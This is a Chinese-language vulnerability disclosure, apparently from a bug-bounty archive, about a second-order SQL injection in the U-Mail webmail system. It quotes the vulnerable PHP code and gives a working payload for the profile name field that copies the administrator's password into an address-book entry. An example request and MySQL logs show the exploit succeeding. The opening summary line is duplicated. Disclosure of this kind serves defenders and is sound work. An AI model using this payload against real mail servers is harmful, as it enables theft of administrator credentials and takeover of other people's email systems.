### 简要描述: U-Mail邮件系统二次注入漏洞,可直接获取管理员密码 ### 详细说明: 版本:最新版v9.8.57 漏洞文件 /client/oab/module/operates.php 代码 ``` if ( ACTION == "save-to-pab" ) { include_once( LIB_PATH."PAB.php" ); $PAB = PAB::getinstance( ); $maillist_id = gss( $_GET['maillist'] ); if ( $maillist_id ) { $member_all = $Maillist->getMemberByMaillistID( $maillist_id, "Mailbox,FullName", 0 ); if ( !$member_all ) { dump_json( array( "status" => TRUE, "message" => "" ) ); } foreach ( $member_all as $member ) { if ( !$PAB->getContactByMail( $user_id, $member['Mailbox'], "contact_id", 0 ) ) { $data = array( "user_id" => $user_id, "fullname" => $member['FullName'],//二次注入 "pref_email" => $member['Mailbox'], "updated" => date( "Y-m-d H:i:s" ) ); $res = $PAB->add_contact( $data, 0 ); if ( !$res ) { dump_json( array( "status" => FALSE, "message" => el( "添加联系人时发生错误,添加失败!", "" ) ) ); } } } } else { $user_ids = gss( $_GET['userlist'] ); $user_ids = id_list_filter( $user_ids );//WooYun-2014-72963 if ( !$user_ids ) { dump_msg(...
### 简要描述: U-Mail邮件系统二次注入漏洞,可直接获取管理员密码 ### 详细说明: 版本:最新版v9.8.57 漏洞文件 /client/oab/module/operates.php 代码 ``` if ( ACTION == "save-to-pab" ) { include_once( LIB_PATH."PAB.php" ); $PAB = PAB::getinstance( ); $maillist_id = gss( $_GET['maillist'] ); if ( $maillist_id ) { $member_all = $Maillist->getMemberByMaillistID( $maillist_id, "Mailbox,FullName", 0 ); if ( !$member_all ) { dump_json( array( "status" => TRUE, "message" => "" ) ); } foreach ( $member_all as $member ) { if ( !$PAB->getContactByMail( $user_id, $member['Mailbox'], "contact_id", 0 ) ) { $data = array( "user_id" => $user_id, "fullname" => $member['FullName'],//二次注入 "pref_email" => $member['Mailbox'], "updated" => date( "Y-m-d H:i:s" ) ); $res = $PAB->add_contact( $data, 0 ); if ( !$res ) { dump_json( array( "status" => FALSE, "message" => el( "添加联系人时发生错误,添加失败!", "" ) ) ); } } } } else { $user_ids = gss( $_GET['userlist'] ); $user_ids = id_list_filter( $user_ids );//WooYun-2014-72963 if ( !$user_ids ) { dump_msg( "param_error", el( "参数错误!", "" ) ); } $where = "t1.UserID IN (".$user_ids.")"; $arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, "", "", "", "", 0 ); $user_all = $arr_tmp['data']; if ( !$user_all ) { dump_json( array( "status" => TRUE, "message" => "" ) ); } foreach ( $user_all as $user ) { $qq = $msn = ""; if ( strpos( $user['qqmsn'], "@" ) ) { $msn = $user['qqmsn']; } else { $qq = $user['qqmsn']; } if ( !$PAB->getContactByMail( $user_id, $user['email'], "contact_id", 0 ) ) { $data = array( "user_id" => $user_id, "fullname" => $user['FullName'], "pref_email" => $user['email'], "pref_tel" => $user['teleextension'] ? $user['teleextension'] : $user['mobil'], "birthday" => $user['birthday'], "im_qq" => $qq, "im_msn" => $msn, "updated" => date( "Y-m-d H:i:s" ) ); $res = $PAB->add_contact( $data, 0 );//二次注入 if ( !$res ) { dump_json( array( "status" => FALSE, "message" => el( "添加联系人时发生错误,添加失败!", "" ) ) ); } } } } dump_json( array( "status" => TRUE, "message" => "" ) ); } ``` 漏洞是先引入单引号,引入数据库,在个人资料处,填写如下exp,如图 ',`homepage`=(SELECT password from userlist where userid=2)# [<img src="https://images.seebug.org/upload/201503/031118376f5e9e79933c526fa934ebe3656a4a20.png" alt="t.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/031118376f5e9e79933c526fa934ebe3656a4a20.png) http://mail.fuck.com/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=test2 [<img src="https://images.seebug.org/upload/201503/031119328af0264050e5249ea678869e6698cbd8.png" alt="t2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/031119328af0264050e5249ea678869e6698cbd8.png) 然后执行该漏洞函数,请求为 [<img src="https://images.seebug.org/upload/201503/0311210025bbbba23fdb15b8d87af5175b6e4c2d.png" alt="t3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/0311210025bbbba23fdb15b8d87af5175b6e4c2d.png) 查看个人通讯录,找到管理员密码,如图 [<img src="https://images.seebug.org/upload/201503/031121465dc2708c850931464260d9c82b56f9d7.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/031121465dc2708c850931464260d9c82b56f9d7.png) SQL执行的过程为 ``` 150227 11:43:30 8724 Connectumail@localhost on 8724 QuerySET NAMES 'UTF8' 8724 Init DBumail 8724 QueryUPDATE userlist SET `FullName`='\',`homepage`=(SELECT password from userlist where userid=2)#',`EnglishName`='' WHERE UserID='13' 8724 QueryUPDATE mailuserinfo SET `sex`='0',`birthday`='0000-00-00',`mobil`='',`teleextension`='',`extnum`='',`qqmsn`='',`worknum`='',`memo`='',`o_group`='' WHERE UserID='13' 8724 Quit 150227 11:46:10 8727 Connectumail@localhost on 8727 QuerySET NAMES 'UTF8' 8727 Init DBumail 8727 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (13) ORDER BY t1.OrderNo DESC,t1.Mailbox ASC 8727 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (13) ORDER BY t1.OrderNo DESC,t1.Mailbox ASC 8727 QuerySELECT contact_id FROM pab_contact WHERE user_id='13' AND pref_email='test2@fuck.com' LIMIT 1 8727 QueryINSERT INTO pab_contact SET `user_id`='13',`fullname`='',`homepage`=(SELECT password from userlist where userid=2)#',`pref_email`='test2@fuck.com',`pref_tel`='',`birthday`='0000-00-00',`im_qq`='',`im_msn`='',`updated`='2015-02-27 11:46:10' 8727 Quit ``` ### 漏洞证明: 如上
